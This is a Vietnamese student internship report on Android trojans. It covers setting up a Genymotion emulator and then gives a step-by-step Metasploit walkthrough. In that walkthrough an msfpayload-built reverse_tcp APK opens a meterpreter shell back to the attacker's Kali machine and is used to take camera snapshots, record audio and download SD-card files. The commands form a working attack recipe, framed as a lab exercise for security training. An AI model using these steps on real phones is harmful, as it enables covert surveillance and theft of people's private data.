Athena

TRUNG TÂM ĐÀO TẠO QUẢNG TRỊ MẠNG & AN NINH MẠNG QUỐC TẾ

Báo cáo thực tập :

Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên

điện thoại sử dụng Android và gửi ra ngoài

GVHD: Võ Đỗ Thắng Sinh viên: Trần Trọng An

Báo cáo:

Phần 1:Giả lập Android ảo

Phần 2:Tạo mã độc xâm nhập Android

Phần 1:Giả lập Android ảo bằng Genymotion

Genymotion là phần mềm giúp tạo các máy ảo Android trên PC để có thể thoải mái cài và sử dụng app từ Google Play. Chúng ta cũng được phép truy cập vào những thành phần hệ thống khác, ví dụ như homescreen, phần cài đặt, thanh thông báo... y hệt như trên thiết bị di động, và lại hoàn toàn miễn phí.

Genymotion thực chất sử dụng VirtualBox để tạo ra các máy ảo, tuy nhiên nó sẽ giúp chúng ta đơn giản được nhiều bước thiết lập. Genymotion được viết nên chủ yếu để các lập trình viên kiểm tra phần mềm của mình trước khi đưa Google Play, nhưng chúng ta hoàn toàn có thể dùng nó cho nhu cầu chạy app thông thường cũng được.

Genyra đời mục đích chính là để cho mọi ng trải nghiệm 1 chiếc điện thoại thật 1 cách tốt nhất :+ Người chưa bao giờ thấy cái điện thoại Android và muốn tập xài thử+ Những người có máy thật muốn cài + chạy thử ứng dụng trước khi cài vào máy (đề phòng virus,app lừa đảo)+ Lập trình viên test thử ứng dụng của họ viết.+ Giải trí cơ bản với game nhỏ

Geny Motion có rất nhiều ưu điểm :- Hỗ trợ OpenGL 2.0 nên xử lí đồ họa, chơi game thì k cần hỏi ( nhưng chưa ổn định lắm, nhiều game bị văng)- Cài được ứng dụng, game, vào CH Play vô tư.- Hiệu ứng chuyển mượt hơn Android X86 nhiều.- Hỗ trợ đúng độ phân giải của 1 máy điện thoại thật ( galaxy S4,HTC One, Xperia Z)- Tự xoay màn hình với ứng dụng cần xoay ( như chơi chém quả hoặc AngryBird ) - Có giả lập định vị GPS, giả lập Pin, giả lập Camera trước/sau- Kết nối Eclipse để lập trình cực kì đơn giản, chỉ cần trỏ tới thư mục sdk là xong

Cài đặt Genymotion:Đầu tiên bạn vào trang http://www.genymotion.com/, tạo một tài khoản. Sau khi đăng nhập thành công bạn download phiên bản Windows 32/64 bits (with VirtualBox)

Trang 2

Khi đã tải và cài đặt xong Genymotion, hãy chạy ứng dụng này lên. Chúng ta sẽ đi qua một số bước thiết lập như sau:Đăng nhập vào ứng dụng Genymotion bằng tài khoản mà bạn mới vừa đăng kí ở trên.

Trang 3

Bạn sẽ được hỏi về việc chọn thiết bị giả lập môi trường Android ảo. Có rất nhiều máy ảo, ví dụ như HTC One, Xperia Z, Samsung Galaxy S4 cho đến các máy Nexus, có cả một số tablet ở đây nữa. Chọn lấy máy nào đó bạn thích, rồi tiếp tục nhấn nút Add và nút Next. Đợi cho máy ảo tải về, có thể sẽ hơi lâu đấy vì đến một hai trăm MB lận. Nên chọn những máy ảo có chữ "with Google Apps" để có sẵn những kho Google Play

Sau khi tải về xong, hãy nhấn đúp vào máy ảo bạn tính sử dụng. Một hộp thoại thông báo sẽ xuất hiện, ở hộp thoại "Path to Android SDK", hãy trỏ đường dẫn đến thư mục Android SDK mà bạn mới vừa tải về ở trên. Lưu ý là phải trỏ đúng vào thư mục có chữ sdk bên trong nữa nhé, đến khi nào dòng chữ "ABD from Android Developer Tools successfully found là được". Nhấn OK để hoàn tất

Trang 4

Quay trở lại giao diện chính của Genymotion, nhấp vào máy ảo mà bạn muốn chạy. Chờ một lát là máy sẽ xuất hiện lên như hình bên dưới. Tiếp đó bạn có thể dùng chuột để tương tác với máy ảo Android, đăng nhập tài khoản Google, thiết lập màn hình, tải app, nghịch app, vào phần settings...

Trang 5

Trang 6

Phần 2: Tạo mã độc xâm nhập Android

Ở phần này mình sẽ dùng máy Kali Linux làm máy tấn công và dùng Genymotion tạo android ảo làm môi trường bị tấn công.Ta có thể sử dụng lệnh ifconfig để xem IP của máy Kali

Sau khi biết IP của máy tấn công ta vào phần chính tạo backdoor và xâm nhập điều khiển

android

Gõ dòng lệnh:

Msfpayload android/meterpreter/reverse_tcp lhost=<IP> lport=<Port> R >

/root/Desktop/files.apk

IP: là IP của Kali LinuxPort: số port bạn có thể chọn bất kì, sao cho thỏa quy tắt đặt port

Trang 7

Lệnh trên sẽ tạo ra 1 file files.apk trên desktop của Kali, đây chính là một Metasploit reverse tcp backdoor

Tiếp theo, gõ lệnh msfconsole Metasploit

Trang 8

Sau khi msfconsile load xong, ta tạo một handler để xử lí dữ liệu truyền về bằng cách gõ lệnh sau

use exploit/multi/handlerset payload android/meterpreter/reverse_tcpset lhost 192.168.0.104 – nhập địa chỉ IP giống với khi tạo payload ở trên.set lport 8080 – nhập port giống với port khi tạo payload ở trên.ExploitMàn hình sẽ như sau, lúc này ta đang chờ một máy android mở backdoor.

Thử với một máy Xperia Z giả lập, tải về files.apk, cài đặt:

Trang 9

Khi tiến hành cài đặt file.apk ta thấy ứng dụng có các quyền sau:

Trang 10

- Đọc trạng thái và nhận dạng của điện thoại

- Gửi tin nhắn SMS, nhận văn bản SMS

- Chụp ảnh và quay video

- Ghi âm

- Đọc danh sách liên hệ, nhật kí cuộc gọi, ghi âm nhật kí cuộc gọi

- Sửa hoặc xóa nội dung thẻ SD của bạn

Trang 11

- .........

Sau khi cài đặt xong

Sau đó mở ứng dung MainActivity

Trang 12

Vậy là ta đã kết nối thành công tới máy Android này, ở msfconsole sẽ như sau:

Trang 13

Dùng lệnh “help” đê biết những lệnh tấn công android

Sử dụng camera:

Để xem danh sách camera, nhập webcam_list

Trang 14

Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera xem ở danh sách camera ở phần trước. Ví dụ như sau:

File hình đã chụp từ camera của máy android là FrumITki.jpeg được lưu ở /root

của máy

Trang 15

Ghi âm

Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy

Lấy file từ sd card

Để vào sdcard, nhập lệnh : cd /sdcard và lệnh ls để xem danh sách file, thư mục

Trang 16

Ví dụ ở đây, ta tải file App.apk trong thư mục download của sdcard

Dùng lệnh cd /sdcard/Download để vào thư mục

Trang 17

Như trên hình, ta thấy 1 file là App.apk, để tải về máy, ta nhập lệnh

Download App.apk

Và file này sẽ được tải về thư mục root của máy Kali

Trang 18